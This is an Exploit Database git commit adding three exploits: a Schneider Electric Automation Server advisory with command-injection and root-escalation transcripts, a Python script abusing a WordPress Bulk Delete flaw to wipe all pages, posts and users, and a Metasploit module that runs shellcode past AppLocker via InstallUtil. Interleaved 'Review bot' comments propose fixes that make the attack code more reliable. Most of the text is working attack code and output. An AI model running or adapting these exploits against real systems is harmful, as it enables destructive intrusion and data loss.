From b761aa35c0794598ced5588b90ad6a9d3ba2a55c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 4 Mar 2016 05:02:58 +0000
Subject: [PATCH] DB: 2016-03-04 3 new exploits
---
 files.csv | 3 +
 platforms/hardware/remote/39522.txt | 151 ++++++++++++++++++++++++++++
 platforms/php/webapps/39521.txt | 134 ++++++++++++++++++++++++
 platforms/windows/local/39523.rb | 148 +++++++++++++++++++++++++++
 4 files changed, 436 insertions(+)
 create mode 100755 platforms/hardware/remote/39522.txt
 create mode 100755 platforms/php/webapps/39521.txt
 create mode 100755 platforms/windows/local/39523.rb
diff --git a/files.csv b/files.csv
index c88e5036f..841ba5452 100755
--- a/files.csv
+++ b/files.csv
@@ -35758,3 +35758,6 @@ id,file,description,date,author,platform,type,port
 39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
 39519,platforms/win32/shellcode/39519.c,"x86 Windows Null-Free Download & Run via WebDAV Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win32,shellcode,0
 39520,platforms/win64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win64,local,0
+39521,platforms/php/webapps/39521.txt,"WordPress Bulk Delete Plugin 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80
+39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
+39523,platforms/windows/local/39523.rb,"AppLocker Execution Prevention Bypass",2016-03-03,metasploit,windows,local,0
diff --git a/platforms/hardware/remote/39522.txt b/platforms/hardware/remote/39522.txt
new file mode 100755
index 000000000..ade5695db
--- /dev/null
+++ b/platforms/hardware/remote/39522.txt
@@ -0,0 +1,151 @@ +*# Exploit Title: [*Schneider Electric SBO / AS Multiple Vulnerabilities] +# Discovered by: Karn Ganeshen +# Vendor Homepage: [www.schneider-electric.com*] * +*# Versions Reported: [* +Automation Server Series (AS, AS-P), v1.7 and prior +*] * +# CVE-ID: [CVE-2016-2278] + +About +Schneider Electric’s corporate headquarters is located in Paris, France, +and it maintains offices in more than 100 countries worldwide. + +The affected product, Automation Server, is a building automation system +for small and medium-sized buildings. According to Schneider Electric, +Automation Server is deployed in the Commercial Facilities sector. +Schneider Electric estimates that this product is used worldwide. + +*Vulnerabilities* +*1. Weak credential management* +CVE-ID: None [ Mitre, CVE? ] + +There are two primary users: +a. root - password is not set by default - this is a problem as we will see +later in the vuln findings +- By default, root cannot SSH in. +b. admin - default password is 'admin' +- Anyone can remotely ssh in to the device using default admin/admin login. + +The system / application allows a) weak creds to start with, and more +importantly, b) vulnerable versions lacks the mechanism to forcefully have +the user change the initial password on first use or later. This has been +fixed in the latest version. + +*2. OS Command Injection* +*CVE-ID*: CVE-2016-2278 +*https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 +* + +After logging in to the device over SSH, the 'admin' user - the only +active, administrative user at this point - is provided a restricted shell +(msh), which offers a small set of, application- specific functional +options. + +$ ssh -l admin +Password: + +Welcome! 
(use 'help' to list commands) +admin@box:> + +admin@box:> *release* +NAME=SE2Linux +ID=se2linux +PRETTY_NAME=SE2Linux (Schneider Electric Embedded Linux) +VERSION_ID=0.2.0.212 + +admin@box:> + +admin@box:> help +usage: help [command] +Type 'help [command]' for help on a specific command. + +Available commands: +exit - exit this session +ps - report a snapshot of the current processes readlog - read log files +reboot - reboot the system +setip - configure the network interface +setlog - configure the logging +setsnmp - configure the snmp service +setsecurity - configure the security +settime - configure the system time +top - display Linux tasks +uptime - tell how long the system has been running release - tell the os +release details + +Attempting to run any different command will give an error message. + +However, this restricted shell functionality (msh) can be bypassed to +execute underlying system commands, by appending '| ' to any of +the above set of commands: + +admin@box:> *uptime | ls* +bin home lost+found root sys config include mnt run tmp dev lib opt sbin usr +etc localization proc share var + +At this point, basically you have full (indirect) control over the server. + +admin@box:> *uptime | cat /etc/passwd * + +root:x:0:0:root:/:/bin/sh +daemon:x:2:2:daemon:/sbin:/bin/false +messagebus:x:3:3:messagebus:/sbin:/bin/false +ntp:x:102:102:ntp:/var/empty/ntp:/bin/false +sshd:x:103:103:sshd:/var/empty:/bin/false +app:x:500:500:Linux Application:/:/bin/false +admin:x:1000:1000:Linux User,,,:/:/bin/msh + +admin@box:> uptime | cat /etc/group +root:x:0: +wheel:x:1:admin +daemon:x:2: +messagebus:x:3: +adm:x:5:admin +power:x:20:app +serial:x:21:app +cio:x:22:app +lon:x:23:app +daemonsv:x:30:admin,app +utmp:x:100: +lock:x:101: +ntp:x:102: +sshd:x:103: +app:x:500:admin +admin:x:1000:admin + +*3. Privilege Escalation / access to superuser 'root'* +CVE-ID: None [ Mitre, CVE? 
] + +Since this is an administrative user, an attacker can exploit OS command +injection to perform a variety of tasks from msh shell. But isn’t it better +to get a root shell instead.! + +As observed from Issue 1 above, root does not have a password set, and it +is possible to use 'sudo -i' and become root. + +*Note*: sudo is not presented / offered to 'admin' in the set of functional +options available thru msh. It is required for tech guys / legit admins / +SBO admins to manage the AS system and related functionality. Assumption +from SE team is, a low-skilled attacker / regular, unsophisticated, +non-technical user will not be able to figure it out. If someone does +figure it out, he/she will be responsible enough not to go evill.! + +admin@box:> *sudo -i* + +We trust you have received the usual lecture from the local System +Administrator. It usually boils down to these three things: + +#1) Respect the privacy of others. +#2) Think before you type. +#3) With great power comes great responsibility. + +Password: + +root@box:~> cat /etc/shadow +root:!:16650:0:99999:7::: +sshd:!:1:0:99999:7::: +admin:$6$:16652:0:99999:7::: + ++++++ +-- +Best Regards, +Karn Ganeshen diff --git a/platforms/php/webapps/39521.txt b/platforms/php/webapps/39521.txt new file mode 100755 index 000000000..20b940efe --- /dev/null +++ b/platforms/php/webapps/39521.txt 
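Review bot: The privilege-escalation section attributes the working `sudo -i` to root having no password, but the transcript in this same hunk points elsewhere: the `/etc/shadow` dump shows `root:!:` (a locked account), `/etc/group` shows `wheel:x:1:admin`, and sudo prompts for the invoking user's password, not root's. The enabler is therefore admin's wheel membership (presumably granted sudo rights in a sudoers file the hunk does not show) combined with the default `admin/admin` credential, so the remediation is to drop admin from wheel or tighten sudoers and force a credential change, not to set a root password. I would reword the sentence to `Since 'admin' is a member of 'wheel', 'sudo -i' (authenticated with admin's own, default, password) yields a root shell even though root itself is locked.` The command-injection example `appending '| ' to any of the above` also appears to have lost its placeholder (likely `| <command>`) in publishing and should be restored so the technique is unambiguous.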
@@ -0,0 +1,134 @@ +''' +* Exploit Title: WordPress Bulk Delete Plugin [Privilege Escalation] +* Discovery Date: 2016-02-10 +* Exploit Author: Panagiotis Vagenas +* Author Link: https://twitter.com/panVagenas +* Vendor Homepage: http://bulkwp.com/ +* Software Link: https://wordpress.org/plugins/bulk-delete/ +* Version: 5.5.3 +* Tested on: WordPress 4.4.2 +* Category: WebApps, WordPress + + +Description +----------- + +_Bulk Delete_ plugin for WordPress suffers from a privilege escalation +vulnerability. Any registered user can exploit the lack of capabilities +checks to perform all administrative tasks provided by the _Bulk Delete_ +plugin. Some of these actions, but not all, are: + +- `bd_delete_pages_by_status`: deletes all pages by status +- `bd_delete_posts_by_post_type`: deletes all posts by type +- `bd_delete_users_by_meta`: delete all users with a specific pair of +meta name, meta value + +Nearly all actions registered by this plugin can be performed from any +user, as long as they passed to a query var named `bd_action` and the +user has a valid account. These actions would normally require +administrative wrights, so we can consider this as a privilege +escalation vulnerability. + +PoC +--- + +The following script will delete all pages, posts and users from the +infected website. 
+''' + +#!/usr/bin/python3 + +################################################################################ +# Bulk Delete Privilege Escalation Exploit +# +# **IMPORTANT** Don't use this in a production site, if vulnerable it will +# delete nearly all your sites content +# +# Author: Panagiotis Vagenas +################################################################################ + +import requests + +loginUrl = 'http://example.com/wp-login.php' +adminUrl = 'http://example.com/wp-admin/index.php' + +loginPostData = { +'log': 'username', +'pwd': 'password', +'rememberme': 'forever', +'wp-submit': 'Log+In' +} + +l = requests.post(loginUrl, data=loginPostData) + +if l.status_code != 200 or len(l.history) == 0 or +len(l.history[0].cookies) == 0: +print("Couldn't acquire a valid session") +exit(1) + +loggedInCookies = l.history[0].cookies + +def do_action(action, data): +try: +requests.post( +adminUrl + '?bd_action=' + action, +data=data, +cookies=loggedInCookies, +timeout=30 +) +except TimeoutError: +print('Action ' + action + ' timed out') +else: +print('Action ' + action + ' performed') + +print('Deleting all pages') +do_action( +'delete_pages_by_status', +{ +'smbd_pages_force_delete': 'true', +'smbd_published_pages': 'published_pages', +'smbd_draft_pages': 'draft_pages', +'smbd_pending_pages': 'pending_pages', +'smbd_future_pages': 'future_pages', +'smbd_private_pages': 'private_pages', +} +) + +print('Deleting all posts from all default post types') +do_action('delete_posts_by_post_type', {'smbd_types[]': [ +'post', +'page', +'attachment', +'revision', +'nav_menu_item' +]}) + +print('Deleting all users') +do_action( +'delete_users_by_meta', +{ +'smbd_u_meta_key': 'nickname', +'smbd_u_meta_compare': 'LIKE', +'smbd_u_meta_value': '', +} +) + +exit(0) + + +''' +Solution +-------- + +Upgrade to v5.5.4 + +Timeline +-------- + +1. **2016-02-10**: Requested CVE ID +2. **2016-02-10**: Vendor notified through wordpress.org support forums +3. 
**2016-02-10**: Vendor notified through the contact form at bulkwp.com +4. **2016-02-10**: Vendor responded and received details about the issue +5. **2016-02-10**: Vendor verified vulnerability +6. **2016-02-13**: Vendor released v5.5.4 which resolves this issue +''' \ No newline at end of file diff --git a/platforms/windows/local/39523.rb b/platforms/windows/local/39523.rb new file mode 100755 index 000000000..549c78585 --- /dev/null +++ b/platforms/windows/local/39523.rb 
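Review bot: In `do_action`, `except TimeoutError:` never matches a requests timeout, which is raised as `requests.exceptions.Timeout` (a `RequestException`, not a subclass of the builtin `TimeoutError`), so a slow delete action aborts the whole PoC with an unhandled exception instead of printing the 'timed out' message; the clause should read `except requests.exceptions.Timeout:`. The login guard `if l.status_code != 200 or len(l.history) == 0 or` is also split across two lines with no backslash or parentheses as published, which is a SyntaxError in Python 3 — this may be a line-wrapping artifact of the post, but as it stands the script will not run. Note too that `requests` is third-party and not installed by default, which the header comment could state next to the destructive-use warning.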
@@ -0,0 +1,148 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit4 < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::Post::File
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'AppLocker Execution Prevention Bypass',
+ 'Description' => %q{
+ This module will generate a .NET service executable on the target and utilise
+ InstallUtil to run the payload bypassing the AppLocker protection.
+
+ Currently only the InstallUtil method is provided, but future methods can be
+ added easily.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Casey Smith', # Original AppLocker bypass research
+ 'OJ Reeves' # MSF module
+ ],
+ 'Platform' => [ 'win' ],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Targets' => [ [ 'Windows', {} ] ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> 'Aug 3 2015',
+ 'References' =>
+ [
+ ['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
+ ]
+ ))
+
+ register_options([
+ OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
+ 'INSTALLUTIL', %w(INSTALLUTIL)])])
+ end
+
+ # Run Method for when run command is issued
+ def exploit
+ if datastore['TECHNIQUE'] == 'INSTALLUTIL'
+ if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
+ fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
+ end
+ end
+
+ # sysinfo is only on meterpreter sessions
+ print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+ if datastore['TECHNIQUE'] == 'INSTALLUTIL'
+ execute_installutil
+ end
+ end
+
+ def execute_installutil
+ envs = get_envs('TEMP', 'windir')
+
+ dotnet_path = get_dotnet_path(envs['windir'])
+ print_status("Using .NET path #{dotnet_path}")
+
+ cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
+ exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
+
+ installutil_path = "#{dotnet_path}\\InstallUtil.exe"
+
+ print_status("Writing payload to #{cs_path}")
+ write_file(cs_path, generate_csharp_source)
+ register_files_for_cleanup(cs_path)
+
+ print_status("Compiling payload to #{exe_path}")
+ csc_path = "#{dotnet_path}\\csc.exe"
+ csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
+ vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
+ cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
+
+ print_status("Executing payload ...")
+ vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
+ client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
+ register_files_for_cleanup(exe_path)
+ end
+
+ def get_dotnet_path(windir)
+ base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ?
'' : '64'}"
+ paths = dir(base_path).select {|p| p[0] == 'v'}
+ dotnet_path = nil
+
+ paths.reverse.each do |p|
+ path = "#{base_path}\\#{p}"
+ if directory?(path) && file?("#{path}\\InstallUtil.exe")
+ dotnet_path = path
+ break
+ end
+ end
+
+ unless dotnet_path
+ fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
+ end
+
+ dotnet_path
+ end
+
+ def generate_csharp_source
+ sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
+ cs = %Q^
+using System;
+
+namespace Pop
+{
+ public class Program { public static void Main() { } }
+
+ [System.ComponentModel.RunInstaller(true)]
+ public class Pop : System.Configuration.Install.Installer
+ {
+ private static Int32 MEM_COMMIT=0x1000;
+ private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
+ private static UInt32 INFINITE = 0xFFFFFFFF;
+
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
+
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
+
+ [System.Runtime.InteropServices.DllImport("kernel32")]
+ private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
+
+ public override void Uninstall(System.Collections.IDictionary s)
+ {
+ byte[] sc = new byte[] {#{sc}};
+ IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+ System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
+ IntPtr id = IntPtr.Zero;
+ WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
+ }
+ }
+}
+ ^
+
+ cs
+ end
+
+end
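Review bot: `execute_installutil` discards the result of `cmd_exec(csc_path, ...)` and immediately launches InstallUtil against `exe_path` without confirming the compile produced it, so a failed build (csc blocked by policy, missing, or a compiler error) is reported as 'Executing payload ...' with no indication that anything went wrong. I would keep the compiler output and guard the launch: `out = cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")` followed by `fail_with(Failure::Unknown, "Compilation failed: #{out}") unless file?(exe_path)`. Relatedly, `get_dotnet_path` only probes for `InstallUtil.exe`, so the framework directory it picks may not contain `csc.exe`; adding `&& file?("#{path}\\csc.exe")` to that condition makes the selection match what the module actually runs. The generated installer also allocates the stub with `PAGE_EXECUTE_READWRITE`, which is an easy heuristic for memory scanners — worth a comment noting it is a known detection artifact rather than a required choice.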